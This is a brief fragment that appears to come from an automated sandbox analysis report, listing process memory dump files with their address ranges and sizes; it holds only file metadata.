memory/6380-311-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/6400-312-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/6400-350-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/6400-352-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/6400-356-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB